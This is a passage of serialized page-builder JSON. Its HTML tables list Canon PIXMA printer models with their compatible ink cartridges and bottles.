width=\\\"170\\\"><p>PIXMA MP287<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP460<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP476<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-831 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-830 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP486<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP496<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP497<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP500<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP520<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP530<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP568<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP600<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b289177\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b0d2e40\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP610<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP628<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP638<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP648<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP800<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP800R<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP810<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP830<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP970<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP988<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP996<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d0130d\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"fc01984\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6549880\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX308<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-831 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-830 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX328<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX338<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX347<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX366<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX426<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX876<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX886<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-726 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-726 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-726 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-726 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-725 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA PRO-1<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-29 (Chroma Optimizer)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Dark Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Light Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Matte Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Photo Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Red)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Yellow)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b7fc065\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"387b65d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA PRO-10<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-72 (Chroma Optimizer)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Matte Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Photo Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Red)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA PRO-100<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-42 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Light Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TR8570<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td 